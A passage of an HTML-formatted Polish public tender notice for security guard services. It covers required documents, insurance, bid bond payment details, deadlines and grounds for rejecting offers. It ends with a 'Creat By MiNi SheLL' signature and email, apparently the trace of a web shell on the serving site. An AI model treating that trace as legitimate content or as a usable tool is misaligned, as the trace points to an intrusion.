postępowaniu: <span class="normal">Wykaz oświadczeń lub dokumentów składanych przez Wykonawcę, w postępowaniu na wezwanie Zamawiającego – w zakresie spełniania<br/>warunków udziału w postepowaniu<br/>1.1. w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej będącej przedmiotem zamówienia,<br/>dokument potwierdzający posiadanie koncesji na wykonywanie działalności, o której mowa w art. 3 ust. 1 i 2 ustawy o ochronie osób<br/>i mienia, w zakresie ochrony osób i mienia na obszarze , którego dotyczy przedmiotowe zamówienie, Okres ważności koncesji nie<br/>może być krótszy niż okres realizacji przedmiotowego zamówienia.<br/>1.2. w zakresie zdolności technicznej: wykaz wykonanych (wykonywanych) w okresie ostatnich trzech lat usług, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich wartości, także dla wymaganych okresów, nazwy<br/>zamawiającego, przedmiotu ze wskazaniem rodzaju chronionego obiektu, dat wykonywania oraz dokumenty potwierdzające, że<br/>usługi te zostały lub są wykonywane należycie, przy czym poświadczenie w odniesieniu do nadal wykonywanych usług okresowych<br/>lub ciągłych powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, a jeżeli z uzasadnionych<br/>przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt powyżej wówczas<br/>składa oświadczenie; w przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały<br/>wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów (należytego wykonania), – wzór wykazu - Załącznik nr<br/>5 do SWZ,<br/>1.3. wykaz narzędzi, wyposażenia i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia, co najmniej<br/>wskazanych w rozdziale VI SWZ , wraz z informacją o podstawie dysponowania tymi zasobami - wzór - Załącznik nr 7 do SWZ, oraz<br/>zezwolenie Urzędu Komunikacji Elektronicznej w sprawie przydziału częstotliwości i zezwolenie na używanie urządzeń<br/>radiokomunikacyjnych, wydane na podstawie art. 145 ustawy z dnia 16 lipca 2004 r. Prawo telekomunikacyjne (t.j. Dz. U. z 2021r.poz. 576 ze zm.),<br/>1.4. w zakresie zdolności zawodowej - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności<br/>wskazanych w rozdziale VI SWZ wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia,<br/>a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wraz z<br/>dołączeniem dokumentów potwierdzających posiadanie przez wykazane osoby kwalifikacji – wzór – Załącznik nr 6,<br/>1.5. w zakresie sytuacji ekonomicznej i finansowej - polisy lub innego dokumentu potwierdzającego, że wykonawca jest<br/>ubezpieczony odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 2.000.000,00 zł, dla na jedno i na wszystkie zdarzenia, zgodnie z § 8 ust. 1 pkt 4 Rozporządzenia<br/>Ministra Rozwoju, pracy i technologii z dn. 30.12.2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów<br/>lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. 2020, poz.<br/>2415). (oryginał / kopia poświadczona za zgodność). Wykonawca zobowiązuje się do utrzymywania tego ubezpieczenia w całym okresie trwania umowy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty Wykonawca dołącza aktualne na dzień składania ofert:<br/>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu<br/>Oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego<br/>.Oświadczenie Wykonawców wspólnie ubiegających się o udzielenia zamówienia składane na podstawie art. 117 ust.4<br/>ustawy Pzp ( jeżeli dotyczy).Oświadczenie podmiotu udostępniającego zasoby składane podstawie art. 125 ust. 5 ustawy<br/>Pzp (jeżeli dotyczy).Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, na<br/>zasadach określonych w art. 118 ustawy PZP, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów. Pełnomocnictwo - wymagane, jeżeli ofertę w postępowaniu składa w imieniu Wykonawcy pełnomocnik.<br/>Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Zamawiający zobowiązuje Wykonawcę do złożenia wadium zgodnie z art. 281 ust. 2 pkt 10 ustawy PZP<br/>2) Wadium musi być wniesione przed upływem terminu składania ofert w formie, o której mowa w art. 97 ust. 7 pkt ustawy<br/>PZP. Zwrot wadium nastąpi na zasadach określonych w art. 98 ustawy PZP.<br/>3) Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>• W pieniądzu,<br/>• w gwarancjach bankowych,<br/>• w gwarancjach ubezpieczeniowych,<br/>• w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4) Zamawiający ustala wysokość wadium na kwotę 5 000,00 zł (pięć tysięcy złotych 00/100).<br/>5) Wadium, o którym mowa w art. 97 ust. 7 pkt 1 Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego<br/>BGK O/Katowice, nr konta: 73 1130 1017 0021 1000 5290 0004<br/>z adnotacją : „ Wadium – nr sprawy ZP 3/2023.<br/>6) W przypadku wnoszenia wadium w pieniądzu decyduje data i godzina wpływu środków na rachunek Zamawiającego<br/>(wpływ środków na rachunek Zamawiającego musi nastąpić do upływu terminu składania ofert). Zaleca się dołączenie kopii<br/>dokumentu przelewu do oferty celem potwierdzenia tej formy wniesienia wadium. W formularzu ofertowym należy podać<br/>również numer konta, na które Zamawiający winien dokonać zwrotu wadium.<br/>7) Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy PZP,<br/>Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej podpisany<br/>kwalifikowanym podpisem elektronicznym przez osoby uprawnione do wystawienia dokumentu gwarancji lub poręczenia.<br/>Wykonawca powinien przekazać dokument wadium poprzez dołączenie go do oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełniania warunków, o których mowa w art. 108 ust. 1 lub 109 ust.1 ustawy PZP, oraz o których<br/>mowa w Rozdz. VII SWZ.<br/>3)W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, jednolity dokument, o którym mowa w Rozdz.<br/>VII składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia.<br/>4)W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku<br/>przynależności do tej samej grupy kapitałowej, o którym mowa w Rozdz. VII składa każdyz Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia należnego Wykonawcy z tytułu wykonania Umowy, w przypadku, o którym mowa w art. 439 ustawy z dnia z dnia 11 września 2019 r. Prawo zamówień publicznych, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Zamawiający dokona w ofercie poprawy:<br/>a) oczywistych omyłek pisarskich<br/>b) oczywistych omyłek rachunkowych, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek<br/>c) innych omyłek, polegających na niezgodności oferty z treścią ogłoszenia, niepowodujących istotnych zmian w treści oferty<br/>i niezwłocznie zawiadomi o tym Wykonawcę, którego oferta została poprawiona.<br/>2) Zamawiający może:<br/>a) wezwać Wykonawcę do złożenia w wyznaczonym terminie wyjaśnień dotyczących oferty mających wpływ na wysokość<br/>ceny ofertowej ( art. 223 ustawy PZP)<br/>b) wezwać Wykonawcę do uzupełnienia brakujących lub zawierających błędy oświadczeń, dokumentów lub pełnomocnictw.<br/>3) Zamawiający odrzuci ofertę zgodnie z art. 226 ust. 1 ustawy PZP, jeśli:<br/>a) została złożona po terminie składania ofert<br/>b) jej treść nie odpowiada treści niniejszego ogłoszenia wraz z załącznikami<br/>c) została złożona przez Wykonawcę, który podlega wykluczeniu z postępowania<br/>d) została złożona przez Wykonawcę, który nie spełnia warunków udziału w postępowaniu<br/>e) Wykonawca nie udzielił wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz ze złożonymi dowodami potwierdza, że<br/>oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia w rozumieniu art. 224 ustawy PZP)<br/>f) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej<br/>konkurencji.<br/>g) nie została sporządzona lub przekazana w sposób zgodny z wymaganiami technicznymi oraz organizacyjnymi<br/>sporządzenia lub przekazywania ofert przy użyciu środków komunikacji elektronicznej określonymi przez Zamawiającego.<br/>4) Zamawiający zastrzega możliwość unieważnienia niniejszego postępowania, jeżeli:<br/>a) nie złożono żadnej oferty niepodlegającej odrzuceniu,<br/>b) cena najkorzystniejsza oferty przewyższ kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia,<br/>chyba że Zamawiający może zwiększyć tę kwotę do ceny najkorzystniejszej oferty,<br/>c) Zamawiający poinformuje wykonawców o unieważnieniu postępowania za pośrednictwem Sytemu<br/>5) Zamawiający zawiadomi Wykonawców o wyniku postępowania za pośrednictwem Systemu oraz poprzez zamieszczenie<br/>informacji na stronie internetowej wskazanej w punkcie I SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com